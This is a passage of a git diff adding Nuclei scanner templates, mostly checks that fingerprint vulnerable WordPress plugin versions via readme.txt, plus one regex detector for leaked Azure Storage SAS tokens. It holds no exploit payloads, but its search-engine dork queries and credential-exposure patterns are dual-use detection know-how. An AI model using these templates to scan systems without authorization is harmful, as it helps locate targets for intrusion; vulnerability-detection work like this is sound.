+ status:
+ - 200
+
+ - type: word
+ words:
+ - "eelv-redirection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml b/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml
new file mode 100644
index 0000000000..b3d988e062
--- /dev/null
+++ b/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml
@@ -0,0 +1,59 @@
+id: advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a
+
+info:
+ name: >
+ Advanced What should we write next about <= 1.0.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9b09f4de-f67d-4d15-a3e3-0cc78cfe7fe8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-what-should-we-write-about-next/"
+ google-query: inurl:"/wp-content/plugins/advanced-what-should-we-write-about-next/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,advanced-what-should-we-write-about-next,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-what-should-we-write-about-next/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-what-should-we-write-about-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml b/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml
new file mode 100644
index 0000000000..5f9e3b9885
--- /dev/null
+++ b/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml
@@ -0,0 +1,59 @@
+id: ai-quiz-31f0fc808945baa02a83ad64def460f0
+
+info:
+ name: >
+ AI Quiz | Quiz Maker <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ai-quiz/"
+ google-query: inurl:"/wp-content/plugins/ai-quiz/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ai-quiz,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ai-quiz/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ai-quiz"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml b/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml
new file mode 100644
index 0000000000..e92e50e2e5
--- /dev/null
+++ b/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml
@@ -0,0 +1,59 @@
+id: arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml b/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml
new file mode 100644
index 0000000000..a0ca7c62c2
--- /dev/null
+++ b/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml
@@ -0,0 +1,59 @@
+id: armember-membership-f395947e480c6bd2b9668c739bc544ea
+
+info:
+ name: >
+ ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup <= 4.0.51 - Authenticated (Subscriber+) Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/armember-membership/"
+ google-query: inurl:"/wp-content/plugins/armember-membership/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,armember-membership,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "armember-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.51')
\ No newline at end of file
diff --git a/poc/other/azure-storage-sas-leak.yaml b/poc/other/azure-storage-sas-leak.yaml
new file mode 100644
index 0000000000..d5b351fc2c
--- /dev/null
+++ b/poc/other/azure-storage-sas-leak.yaml
@@ -0,0 +1,71 @@
+id: azure-storage-sas-leak
+
+info:
+ name: Azure Storage Shared Access Signature (SAS) Leak
+ author: 0xSH4RKS
+ severity: high
+ description: |
+ Detects exposed Azure Storage Shared Access Signatures (SAS) in connection strings and URLs within HTTP responses.
+ SAS tokens grant access to Azure Storage resources and should be kept confidential.
+ tags: azure, storage, sas, credential-exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: or
+
+ matchers:
+ # Detect Service SAS in connection strings with or without SharedAccessSignature=
+ - type: regex
+ regex:
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+
+ # Detect Account SAS in connection strings with or without SharedAccessSignature=
+ - type: regex
+ regex:
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+
+ # Detect SAS tokens in URLs
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+
+ # Detect SAS tokens in URLs with any parameters
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}[^&\s]*&sig=[\w%]+[^&\s]*&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}[^&\s]*&sig=[\w%]+[^&\s]*&sp=[rwlmad]+'
+
+ # Detect explicit storage endpoints with SAS tokens in URLs
+ - type: regex
+ regex:
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}.*sig=[\w%]+.*sp=[rwlmad]+'
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}.*sig=[\w%]+.*sp=[rwlmad]+'
+
+ # General word matchers to ensure the presence of key parameters
+ - type: word
+ words:
+ - "sv="
+ - "sig="
+ - "sp="
+ condition: and
diff --git a/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml b/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml
new file mode 100644
index 0000000000..2bd65b7ac3
--- /dev/null
+++ b/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml
@@ -0,0 +1,59 @@
+id: build-app-online-9dd1526748a52141c3bb31208d05fbb4
+
+info:
+ name: >
+ Build App Online <= 1.0.22 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a68e014-69df-4498-9cc2-618d966e5ed6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/build-app-online/"
+ google-query: inurl:"/wp-content/plugins/build-app-online/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,build-app-online,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/build-app-online/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "build-app-online"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.22')
\ No newline at end of file
diff --git a/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml b/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
new file mode 100644
index 0000000000..b84930aba9
--- /dev/null
+++ b/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
@@ -0,0 +1,59 @@
+id: cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6
+
+info:
+ name: >
+ Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) Filter Updates/Deletions
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-message-filter/"
+ google-query: inurl:"/wp-content/plugins/cf7-message-filter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cf7-message-filter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-message-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.3')
\ No newline at end of file
diff --git a/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml b/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml
new file mode 100644
index 0000000000..7365290f37
--- /dev/null
+++ b/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml
@@ -0,0 +1,59 @@
+id: clickbank-storefront-8afd882eedd0c6f2566c03372054a9da
+
+info:
+ name: >
+ Clickbank WordPress Plugin (Storefront) <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clickbank-storefront/"
+ google-query: inurl:"/wp-content/plugins/clickbank-storefront/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clickbank-storefront,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clickbank-storefront/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clickbank-storefront"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7')
\ No newline at end of file
diff --git a/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml b/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml
new file mode 100644
index 0000000000..10c4c8e1a1
--- /dev/null
+++ b/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml
@@ -0,0 +1,59 @@
+id: cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml b/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml
new file mode 100644
index 0000000000..e918e0fad8
--- /dev/null
+++ b/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml
@@ -0,0 +1,59 @@
+id: cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml b/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml
new file mode 100644
index 0000000000..2cff0b11b6
--- /dev/null
+++ b/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml
@@ -0,0 +1,59 @@
+id: cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857
+
+info:
+ name: >
+ Custom Post Type to Map Store <= 1.1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea5c0b48-7e8e-492e-b0de-14681e31fe85?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cpt-to-map-store/"
+ google-query: inurl:"/wp-content/plugins/cpt-to-map-store/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cpt-to-map-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cpt-to-map-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cpt-to-map-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml b/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml
new file mode 100644
index 0000000000..1ccfc6db8d
--- /dev/null
+++ b/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml
@@ -0,0 +1,59 @@
+id: dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd
+
+info:
+ name: >
+ DancePress (TRWA) <= 3.1.11 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c2bddb3-2b23-4a75-abe2-db787441a1b2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/dancepress-trwa/"
+ google-query: inurl:"/wp-content/plugins/dancepress-trwa/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,dancepress-trwa,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dancepress-trwa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dancepress-trwa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.11')
\ No newline at end of file
diff --git a/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml b/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml
new file mode 100644
index 0000000000..ba6154be02
--- /dev/null
+++ b/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml
@@ -0,0 +1,59 @@
+id: depicter-91350bdff3ee5a46d0032f5a28a6265e
+
+info:
+ name: >
+ Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel <= 3.2.1- Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/965cacd3-1786-4e7d-8209-eea293b161d3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/depicter/"
+ google-query: inurl:"/wp-content/plugins/depicter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,depicter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/depicter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "depicter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml b/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml
new file mode 100644
index 0000000000..a7f0cee1aa
--- /dev/null
+++ b/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml
@@ -0,0 +1,59 @@
+id: devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab
+
+info:
+ name: >
+ Devnex Addons For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c179cb56-6d18-4e04-8539-3834a286e302?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/devnex-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/devnex-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,devnex-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devnex-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devnex-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml b/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml
new file mode 100644
index 0000000000..e91aafffd0
--- /dev/null
+++ b/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml
@@ -0,0 +1,59 @@
+id: donate-me-574b61de3d2f5e0e6650c80193c07c44
+
+info:
+ name: >
+ Donate Me <= 1.2.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7df1901f-fb18-4d1b-ac80-38b676efb64f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/donate-me/"
+ google-query: inurl:"/wp-content/plugins/donate-me/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,donate-me,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/donate-me/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "donate-me"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
